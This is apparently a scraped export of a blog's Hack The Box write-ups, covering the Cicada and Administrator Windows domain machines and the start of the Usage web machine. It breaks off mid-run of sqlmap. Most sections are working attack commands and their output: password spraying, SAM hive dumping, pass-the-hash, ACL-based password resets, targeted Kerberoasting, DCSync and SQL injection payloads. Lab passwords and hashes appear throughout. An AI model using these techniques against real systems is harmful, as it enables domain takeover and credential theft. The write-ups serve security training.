Owners (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 521: CICADA\\Read-only Domain Controllers (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 522: CICADA\\Cloneable Domain Controllers (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 525: CICADA\\Protected Users (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 526: CICADA\\Key Admins (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 527: CICADA\\Enterprise Key Admins (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 553: CICADA\\RAS and IAS Servers (SidTypeAlias)\nSMB 10.10.11.35 445 CICADA-DC 571: CICADA\\Allowed RODC Password Replication Group (SidTypeAlias)\nSMB 10.10.11.35 445 CICADA-DC 572: CICADA\\Denied RODC Password Replication Group (SidTypeAlias)\nSMB 10.10.11.35 445 CICADA-DC 1000: CICADA\\CICADA-DC$ (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 1101: CICADA\\DnsAdmins (SidTypeAlias)\nSMB 10.10.11.35 445 CICADA-DC 1102: CICADA\\DnsUpdateProxy (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 1103: CICADA\\Groups (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 1104: CICADA\\john.smoulder (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 1105: CICADA\\sarah.dantelia (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 1106: CICADA\\michael.wrightson (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 1108: CICADA\\david.orelious (SidTypeUser)\nSMB 10.10.11.35 445 CICADA-DC 1109: CICADA\\Dev Support (SidTypeGroup)\nSMB 10.10.11.35 445 CICADA-DC 1601: CICADA\\emily.oscars (SidTypeUser)\n\nThat gives a list of probable users:\n\njohn.smoulder\nsarah.dantelia\nmichael.wrightson\ndavid.orelious\nemily.oscars\n\nWe spray the HR password over that list. It matches michael.wrightson, and the --users dump that nxc then performs with his account shows that david.orelious wrote his own password in his account description:\n\n$ nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --users\nSMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)\nSMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE\nSMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE\nSMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8\nSMB 10.10.11.35 445 CICADA-DC [*] Trying to dump local users with SAMRPC protocol\nSMB 10.10.11.35 445 CICADA-DC [+] Enumerated domain user(s)\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\Administrator  Built-in account for administering the computer/domain\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\Guest          Built-in account for guest access to the computer/domain\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\krbtgt         Key Distribution Center Service Account\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\john.smoulder\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\sarah.dantelia\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\michael.wrightson\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\david.orelious Just in case I forget my password is aRt$Lp#7t*VQ!3\nSMB 10.10.11.35 445 CICADA-DC cicada.htb\\emily.oscars\n\nWe now have two accounts:\nmichael.wrightson:Cicada$M6Corpb*@Lp#nZp!8\ndavid.orelious:aRt$Lp#7t*VQ!3\n\nSMB DEV share: david\n\ndavid.orelious has read access to the DEV share:\n\nnxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d 'cicada.htb' --shares\nSMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)\nSMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3\nSMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares\nSMB 10.10.11.35 445 CICADA-DC Share     Permissions  Remark\nSMB 10.10.11.35 445 CICADA-DC -----     -----------  ------\nSMB 10.10.11.35 445 CICADA-DC ADMIN$                 Remote Admin\nSMB 10.10.11.35 445 CICADA-DC C$                     Default share\nSMB 10.10.11.35 445 CICADA-DC DEV       READ\nSMB 10.10.11.35 445 CICADA-DC HR        READ\nSMB 10.10.11.35 445 CICADA-DC IPC$      READ         Remote IPC\nSMB 10.10.11.35 445 CICADA-DC NETLOGON  READ         Logon server share\nSMB 10.10.11.35 445 CICADA-DC SYSVOL    READ         Logon server share\n\n$ smbclient //10.10.11.35/DEV -U 'david.orelious'\nPassword for [WORKGROUP\\david.orelious]:\nTry \"help\" to get a list of possible commands.\nsmb: \\> ls\n  .                   D    0  Thu Mar 14 08:31:39 2024\n  ..                  D    0  Thu Mar 14 08:21:29 2024\n  Backup_script.ps1   A  601  Wed Aug 28 13:28:22 2024\n\n    4168447 blocks of size 4096. 403603 blocks available\nsmb: \\> get Backup_script.ps1\ngetting file \\Backup_script.ps1 of size 601 as Backup_script.ps1 (3.1 KiloBytes/sec) (average 3.1 KiloBytes/sec)\n\nThe script in DEV contains emily.oscars's password in clear text:\n\n$ cat Backup_script.ps1\n$sourceDirectory = \"C:\\smb\"\n$destinationDirectory = \"D:\\Backup\"\n\n$username = \"emily.oscars\"\n$password = ConvertTo-SecureString \"Q!3@Lp#M6b*7t*Vt\" -AsPlainText -Force\n$credentials = New-Object System.Management.Automation.PSCredential($username, $password)\n\n$dateStamp = Get-Date -Format \"yyyyMMdd_HHmmss\"\n$backupFileName = \"smb_backup_$dateStamp.zip\"\n$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName\n\nCompress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath\nWrite-Host \"Backup completed successfully. Backup file saved to: $backupFilePath\"\n\nUser account: emily.oscars:Q!3@Lp#M6b*7t*Vt\n\nSMB ADMIN ACCESS / Evil-winrm (user flag)\n\nemily has interesting rights on the SMB shares: read on ADMIN$ and read/write on C$:\n\n$ nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -d 'cicada.htb' --shares\nSMB 10.10.11.35 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)\nSMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\emily.oscars:Q!3@Lp#M6b*7t*Vt\nSMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares\nSMB 10.10.11.35 445 CICADA-DC Share     Permissions  Remark\nSMB 10.10.11.35 445 CICADA-DC -----     -----------  ------\nSMB 10.10.11.35 445 CICADA-DC ADMIN$    READ         Remote Admin\nSMB 10.10.11.35 445 CICADA-DC C$        READ,WRITE   Default share\nSMB 10.10.11.35 445 CICADA-DC DEV\nSMB 10.10.11.35 445 CICADA-DC HR        READ\nSMB 10.10.11.35 445 CICADA-DC IPC$      READ         Remote IPC\nSMB 10.10.11.35 445 CICADA-DC NETLOGON  READ         Logon server share\nSMB 10.10.11.35 445 CICADA-DC SYSVOL    READ         Logon server share\n\n$ smbclient //10.10.11.35/ADMIN$ -U 'emily.oscars%Q!3@Lp#M6b*7t*Vt'\n# OR\nsudo apt install cifs-utils -y\nsudo mount -t cifs //10.10.11.35/ADMIN$ /mnt/smb -o username='emily.oscars',password='Q!3@Lp#M6b*7t*Vt'\n\nShe can also log in over WinRM, which gives the user flag:\n\n$ evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'\n$ cd Desktop\n$ cat user.txt\n5297.....2a75\n\nPrivilege Escalation\n\nEnumeration with emily.oscars\n\n*Evil-WinRM* PS C:\\Users\\emily.oscars.CICADA\\Documents> whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                    State\n============================= ============================== =======\nSeBackupPrivilege             Back up files and directories  Enabled\nSeRestorePrivilege            Restore files and directories  Enabled\nSeShutdownPrivilege           Shut down the system           Enabled\nSeChangeNotifyPrivilege       Bypass traverse checking       Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\n\nExploit SeBackupPrivilege\n\nSeBackupPrivilege lets its holder read any file regardless of its ACL, which includes the registry hives holding the local account hashes. We save the SAM and SYSTEM hives, bring them back to the attacking machine and decrypt them with pypykatz (the SYSTEM hive supplies the boot key needed to decrypt the SAM):\n\n$ reg save hklm\\sam sam.hive\n$ reg save hklm\\system system.hive\n# then fetch both files with Evil-WinRM's download command\n$ pypykatz registry --sam sam.hive system.hive\nWARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work\nWARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work\n============== SYSTEM hive secrets ==============\nCurrentControlSet: ControlSet001\nBoot Key: 3c2b033757a49110a9ee680b46e8d620\n============== SAM hive secrets ==============\nHBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nWDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\nThe Administrator NT hash is all that is needed to pass the hash over WinRM:\n\n$ evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ../desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\desktop> cat root.txt\ne39c.....9300\n","date":"2024-12-06T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cicada-htb/","title":"HTB | Cicada"},{"content":" Machine name: Administrator | OS: Windows | IP: 10.10.11.42 | Difficulty: Medium\nUsers:\nOlivia : ichliebedich\nalexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw\nemily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb\nemma:WwANQWnmJnGV07WQN8bMS7FMAbjNur\nethan : limpbizkit\nAdministrator : 3dc553ce4b9fd20bd016e098d2d2fd2e\n\nEnumeration\n\nThreader 3000\n\n------------------------------------------------------------\n        Threader 3000 - Multi-threaded Port Scanner\n                       Version 1.0.7\n                    A project by The Mayor\n------------------------------------------------------------\nEnter your target IP address or URL here: 10.10.11.42\n------------------------------------------------------------\nScanning target 10.10.11.42\nTime started: 2024-11-27 14:54:16.528194\n------------------------------------------------------------\nPort 21 is open\nPort 53 is open\nPort 139 is open\nPort 135 is open\nPort 88 is open\nPort 464 is open\nPort 445 is open\nPort 389 is open\nPort 593 is open\nPort 636 is open\nPort 3268 is open\nPort 3269 is open\nPort 5985 is open\nPort 9389 is open\nPort 47001 is open\nPort 49665 is open\nPort 49668 is open\nPort 49664 is open\nPort 49666 is open\nPort 49670 is open\nPort 53246 is open\nPort 53276 is open\nPort 53268 is open\nPort 53251 is open\nPort 53313 is open\nPort 63231 is open\nPort scan completed in 0:00:08.796993\n------------------------------------------------------------\nThreader3000 recommends the following Nmap scan:\n************************************************************\nnmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42\n************************************************************\nWould you like to run Nmap or quit to termin
al?\n------------------------------------------------------------\n1 = Run suggested Nmap scan\n2 = Run another Threader3000 scan\n3 = Exit to terminal\n------------------------------------------------------------\nOption Selection: 1\nnmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42\nStarting Nmap 7.80 ( https://nmap.org ) at 2024-11-27 14:55 CET\nNmap scan report for 10.10.11.42\nHost is up (0.038s latency).\n\nPORT      STATE  SERVICE       VERSION\n21/tcp    closed ftp\n53/tcp    closed domain\n88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-27 20:55:50Z)\n135/tcp   open   msrpc         Microsoft Windows RPC\n139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp   closed ldap\n445/tcp   closed microsoft-ds\n464/tcp   open   kpasswd5?\n593/tcp   closed http-rpc-epmap\n636/tcp   closed ldapssl\n3268/tcp  closed globalcatLDAP\n3269/tcp  closed globalcatLDAPssl\n5985/tcp  closed wsman\n9389/tcp  closed adws\n47001/tcp closed winrm\n49664/tcp open   msrpc         Microsoft Windows RPC\n49665/tcp open   msrpc         Microsoft Windows RPC\n49666/tcp open   msrpc         Microsoft Windows RPC\n49668/tcp closed unknown\n49670/tcp closed unknown\n53246/tcp closed unknown\n53251/tcp closed unknown\n53268/tcp closed unknown\n53276/tcp closed unknown\n53313/tcp closed unknown\n63231/tcp closed unknown\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!\n|_smb2-time: ERROR: Script execution failed (use -d to debug)\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 65.94 seconds\n------------------------------------------------------------\nCombined scan completed in 0:02:32.888755\n\nnmap\n\nThat first nmap pass oddly reported as closed most of the ports Threader had just found open; a later rerun shows them open, with the domain name and a 7-hour clock skew that matters for Kerberos later on:\n\nnmap 10.10.11.42 -sV -sC -T4 -Pn\nStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 18:52 EST\nNmap scan report for administrator.htb (10.10.11.42)\nHost is up (0.072s latency).\nNot shown: 988 closed tcp ports (conn-refused)\nPORT     STATE SERVICE       VERSION\n21/tcp   open  ftp           Microsoft ftpd\n| ftp-syst:\n|_  SYST: Windows_NT\n53/tcp   open  domain        Simple DNS Plus\n88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-01 06:52:33Z)\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636/tcp  open  tcpwrapped\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)\n3269/tcp open  tcpwrapped\nService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode:\n|   3:1:1:\n|_    Message signing enabled and required\n| smb2-time:\n|   date: 2024-12-01T06:52:40\n|_  start_date: N/A\n|_clock-skew: 7h00m02s\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 21.37 seconds\n\nrpcclient enumusers\n\nThe box hands out Olivia's credentials, so domain users can be listed through SAMR:\n\nrpcclient -U Olivia%ichliebedich 10.10.11.42 -c \"enumdomusers\"\nuser:[Administrator] rid:[0x1f4]\nuser:[Guest] rid:[0x1f5]\nuser:[krbtgt] rid:[0x1f6]\nuser:[olivia] rid:[0x454]\nuser:[michael] rid:[0x455]\nuser:[benjamin] rid:[0x456]\nuser:[emily] rid:[0x458]\nuser:[ethan] rid:[0x459]\nuser:[alexander] rid:[0xe11]\nuser:[emma] rid:[0xe12]\n\nsmbclient\n\nsmbclient -L //10.10.11.42 -U Olivia%ichliebedich\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share\n        SYSVOL          Disk      Logon server share\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.11.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\nSharpHound\n\nFrom an Evil-WinRM session as Olivia:\nupload SharpHound.ps1\n\nBloodhound\n\nWe import the collected data. Olivia has GenericAll over Michael, so we can reset his password; Michael in turn has ForceChangePassword over Benjamin, so the same trick applies one step further:\n\n# Olivia: GenericAll over the user Michael\nSet-ADAccountPassword -Identity \"Michael\" -NewPassword (ConvertTo-SecureString -AsPlainText \"azertyazerty\" -Force) -Reset\n\n# Log in with Michael's account\nevil-winrm -i 10.10.11.42 -u Michael -p azertyazerty\n\n# Michael: ForceChangePassword over Benjamin\n# First upload PowerView.ps1 to get the needed cmdlets in the Evil-WinRM PowerShell session\nupload PowerView.ps1\n# Dot-source it so it loads into the current PowerShell scope and not a child scope\n. .\\PowerView.ps1\n# Change Benjamin's password\nSet-DomainUserPassword -Identity Benjamin -AccountPassword (ConvertTo-SecureString 'azertyazerty' -AsPlainText -Force) -Verbose\n# Log in as Benjamin\nevil-winrm -i 10.10.11.42 -u Benjamin -p azertyazerty\n# NOTHING!\nsmbclient\n# FTP\nftp 10.10.11.42\n> get Backup.psafe3\n\nBenjamin has no WinRM access and nothing new on SMB, but his account can log in to the FTP server, whose root holds Backup.psafe3. Resetting passwords this way is noisy and locks the real users out; on a real engagement prefer a shadow-credentials or targeted-Kerberoast abuse of the same ACLs, or at least restore the original passwords afterwards.\n\nFoothold\n\nBrute-force Backup.psafe3\n\nWe brute-force the master password of Backup.psafe3, which is a Password Safe (v3) database.
Pour cela, on utilise hashcat:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 $ hashcat -m 5200 -a 0 Backup.psafe3 ~/wordlists/rockyou.txt hashcat (v6.2.5) starting OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ===================================================================================================================================== * Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 6839/13742 MB (2048 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt * Slow-Hash-SIMD-LOOP Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 2 MB Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 Backup.psafe3:tekieromucho Session..........: hashcat Status...........: Cracked Hash.Mode........: 5200 (Password Safe v3) Hash.Target......: Backup.psafe3 Time.Started.....: Thu Nov 28 15:13:47 2024 (0 secs) Time.Estimated...: Thu Nov 28 15:13:47 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/leopold/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 27754 H/s (5.85ms) @ Accel:64 Loops:1024 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 5120/14344385 (0.04%) Rejected.........: 0/5120 (0.00%) Restore.Point....: 4608/14344385 (0.03%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 Candidate.Engine.: Device Generator Candidates.#1....: Liverpool -\u0026gt; babygrl Hardware.Mon.#1..: Temp: 60c Util: 22% 
Started: Thu Nov 28 15:13:27 2024
Stopped: Thu Nov 28 15:13:48 2024

PasswordSafe
We install pwsafe, then open the database with the recovered password tekieromucho.

sudo apt install pwsafe
pwsafe ./Backup.psafe3

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

evil-winrm -i 10.10.11.42 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

./nxc smb 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.10.11.42     445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

evil-winrm -i 10.10.11.42 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur

User flag
Finally, we obtain the user flag through Emily.

evil-winrm -i 10.10.11.42 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
3415.....de32

Privilege Escalation
Emily -> Ethan
We have to do a Kerberoasting. According to the write-up, there was a simpler way to do it, using this GitHub repo, which performs in one go all the steps we carried out by hand:
git clone https://github.com/ShutdownRepo/targetedKerberoast

## From Emily's Evil-WinRM session
. .\PowerView.ps1
Set-DomainObject -Identity Ethan -Set @{serviceprincipalname='fakeService/targetHost'}

## From Kali
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo ntpdate administrator.htb
2024-11-29 16:04:44.623613 (-0500) +25200.766571 +/- 0.493670 administrator.htb 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25200.766571

┌──(kali㉿kali)-[~/Downloads]
└─$ GetUserSPNs.py administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -request

hashcat -m 13100 -a 0 ethan_hash.txt ~/wordlists/rockyou.txt --optimized-kernel-enable --show
leopold@leopold-ZenBook-UX434FAC-UX434FA $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$78ac2707afa86369c7b7ac6481d4f104$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:limpbizkit

We obtain Ethan's credentials: ethan:limpbizkit

rpcclient -U "administrator.htb\ethan%limpbizkit" 10.10.11.42
ldapsearch -x -H ldap://10.10.11.42 -D "ethan@administrator.htb" -w "limpbizkit" -b "DC=administrator,DC=htb"

## Attempts to open a shell
$ evil-winrm -i 10.10.11.42 -u ethan -p limpbizkit
$ wmiexec.py 'administrator.htb/ethan:limpbizkit@10.10.11.42'
$ psexec.py 'administrator.htb/ethan:limpbizkit@10.10.11.42'
$ dcomexec.py 'administrator.htb/ethan:limpbizkit@10.10.11.42'

Secretsdump
We retrieve the administrator's hash with the secretsdump script, thanks to the rights held by the user ethan.

secretsdump.py -just-dc ethan:limpbizkit@10.10.11.42 -outputfile dcsync_hashes
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Evil-winrm
Using the Administrator's hash, we can connect directly with evil-winrm:

$ evil-winrm -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -i 10.10.11.42

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -ar---        11/29/2024 10:54 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
8431.....8a6b

Pass The Ticket Attack (PTT)
NOT SUCCESSFUL, AND IN THE END NOT USEFUL?

export KRB5CCNAME=Administrator.ccache
## Request a ticket
getTGT.py ADMINISTRATOR.HTB/Administrator -aesKey 9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Administrator.ccache
","date":"2024-12-01T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/administrator-htb/","title":"HTB | Administrator"},{"content":" Machine name | OS | IP | Difficulty
Usage | Linux | 10.10.11.18 | Easy

Enumeration
nmap
$ nmap 10.10.11.18 -p80,22
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Foothold
usage.htb
We find a website on port 80 of the machine, which redirects us to usage.htb. We therefore add the domain name to /etc/hosts.

SQL Injection
On the website, we notice a login page. It has a "forgot password" section.
When we go there and submit an email containing a ', we notice that the server displays an error message. The input therefore looks vulnerable to SQL injection, so we use sqlmap to check:

sqlmap -r request.txt --data="_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold" -p email --batch --level 5 --risk 3 --threads 10 --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:16:02 /2024-08-06/

[23:16:02] [INFO] parsing HTTP request from 'request.txt'
[23:16:02] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[23:16:05] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests?
[y/N] N
sqlmap identified the following injection point(s) with a total of 735 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue

    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold' AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX
---
[23:25:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL > 5.0.12
[23:25:41] [INFO] fetching database names
[23:25:41] [INFO] fetching number of databases
[23:25:41] [INFO] retrieved: 3
[23:25:47] [INFO] retrieving the length of query output
[23:25:47] [INFO] retrieved: 18
[23:26:30] [INFO] retrieved: information_schema
[23:26:30] [INFO] retrieving the length of query output
[23:26:30] [INFO] retrieved: 18
[23:27:10] [INFO] retrieved: performance_schema
[23:27:10] [INFO] retrieving the length of query output
[23:27:10] [INFO] retrieved: 10
[23:27:36] [INFO] retrieved: usage_blog
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog

[23:27:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 511 times
[23:27:36] [INFO] fetched data logged to text files under '/home/leopold/.local/share/sqlmap/output/usage.htb'
[23:27:36] [WARNING] your sqlmap version is outdated

[*] ending @ 23:27:36 /2024-08-06/

It is indeed vulnerable!
We find a MySQL database: usage_blog

MySQL - usage_blog
With a few more queries, we find a users table in the usage_blog database. In this table, we find the columns:
email
password

$ sqlmap -r request.txt --data="_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&email=leopold" -p email --batch --level 5 --risk 3 --threads 10 -D usage_blog -T users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:30:20 /2024-08-06/

[23:30:20] [INFO] parsing HTTP request from 'request.txt'
[23:30:21] [INFO] resuming back-end DBMS 'mysql'
[23:30:21] [INFO] testing connection to the target URL
got a 302 redirect to 'http://usage.htb/forget-password'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location?
[Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
